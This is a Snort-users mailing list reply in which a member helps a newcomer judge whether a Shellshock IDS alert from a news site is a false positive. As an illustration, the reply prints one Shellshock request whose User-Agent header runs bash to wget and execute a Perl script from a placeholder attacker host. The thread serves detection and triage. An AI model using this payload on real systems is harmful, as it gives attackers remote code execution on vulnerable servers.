[Snort-users] ShellShock Signatures

s0ups . ynots0ups at ...11827...
Tue Mar 3 11:37:54 EST 2015


On Mon, Mar 2, 2015 at 8:54 PM, Colin Edwards <colin.p.edwards at ...11827...>
wrote:

> Hello Snort Users,
>
> I'm a new list member, and happy to say that I've been working with
> Firesight and a couple of ASA-X Firepower modules for almost a week now.
> This is my first time hands-on w/ an IPS/IDS.  I'm here because I found
> this message from this list while researching an alert:
> http://sourceforge.net/p/snort/mailman/message/32980285/ .  I had a user
> viewing a newspaper's website today, and I received an alert for 1:31977.
> I actually wasn't familiar with the domain name, and just searching for the
> domain I saw in the alert in Google also generated an alert from my
> workstation (I assume something to do with Google pulling news/images to
> display in the results?).  The URI from the request does have "() {" in it,
> so that's why it was triggered, but I don't know if it's a False Positive
> alert.  The website was for the Sacramento Bee (www.sacbee.com).  I can
> provide more detail from the pcap / URI when I'm back in the office
> tomorrow.
>
>
> While I'm introducing myself as a snort newbie...If anyone has any
> recommendations for other resources or reading material, feel free to
> message me off-list.
>
> Cheers,
> Colin Edwards
> CISSP, GCIH, GCWN, GSEC, MCSE
>
>
Yo Colin,

As you probably know, Shellshock attacks attempt to exploit environment
variables that use user-provided data. The attacks are pretty easy to
identify as they usually have some recognizable commands after the "() {
:;};". I've actually hardly, if ever, see 1:31977 in my environment as the
majority of the legit hits I see target HTTP header fields (so 1:31978 is
more common) like so:
    GET /cgi-bin/possiblevulnerablescript.cgi
    User-Agent: () { :;}; /bin/bash -c "cd /var/tmp;wget
http://attackerwebsite/maliciousperlcode;perl maliciousperlcode

Fireeye has a good explanation and illustration of the various attack
methods seen for the Shellshock vulnerability which will give you a good
idea on what the common attacks look like. (
https://www.fireeye.com/blog/threat-research/2014/09/shellshock-in-the-wild.html
)

Chances are if it's an HTTP response from an external webserver to a client
browser than it's a FP and poses little to no threat. I'd be interested in
checking out the URI if you want to send it to me.

- s0ups

On Mon, Mar 2, 2015 at 8:54 PM, Colin Edwards <colin.p.edwards at ...11827...>
wrote:

> Hello Snort Users,
>
> I'm a new list member, and happy to say that I've been working with
> Firesight and a couple of ASA-X Firepower modules for almost a week now.
> This is my first time hands-on w/ an IPS/IDS.  I'm here because I found
> this message from this list while researching an alert:
> http://sourceforge.net/p/snort/mailman/message/32980285/ .  I had a user
> viewing a newspaper's website today, and I received an alert for 1:31977.
> I actually wasn't familiar with the domain name, and just searching for the
> domain I saw in the alert in Google also generated an alert from my
> workstation (I assume something to do with Google pulling news/images to
> display in the results?).  The URI from the request does have "() {" in it,
> so that's why it was triggered, but I don't know if it's a False Positive
> alert.  The website was for the Sacramento Bee (www.sacbee.com).  I can
> provide more detail from the pcap / URI when I'm back in the office
> tomorrow.
>
>
> While I'm introducing myself as a snort newbie...If anyone has any
> recommendations for other resources or reading material, feel free to
> message me off-list.
>
> Cheers,
> Colin Edwards
> CISSP, GCIH, GCWN, GSEC, MCSE
>
>
> ------------------------------------------------------------------------------
> Dive into the World of Parallel Programming The Go Parallel Website,
> sponsored
> by Intel and developed in partnership with Slashdot Media, is your hub for
> all
> things parallel software development, from weekly thought leadership blogs
> to
> news, videos, case studies, tutorials and more. Take a look and join the
> conversation now. http://goparallel.sourceforge.net/
> _______________________________________________
> Snort-users mailing list
> Snort-users at lists.sourceforge.net
> Go to this URL to change user options or unsubscribe:
> https://lists.sourceforge.net/lists/listinfo/snort-users
> Snort-users list archive:
> http://sourceforge.net/mailarchive/forum.php?forum_name=snort-users
>
> Please visit http://blog.snort.org to stay current on all the latest
> Snort news!
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.snort.org/pipermail/snort-users/attachments/20150303/ad3bb1d3/attachment.html>


More information about the Snort-users mailing list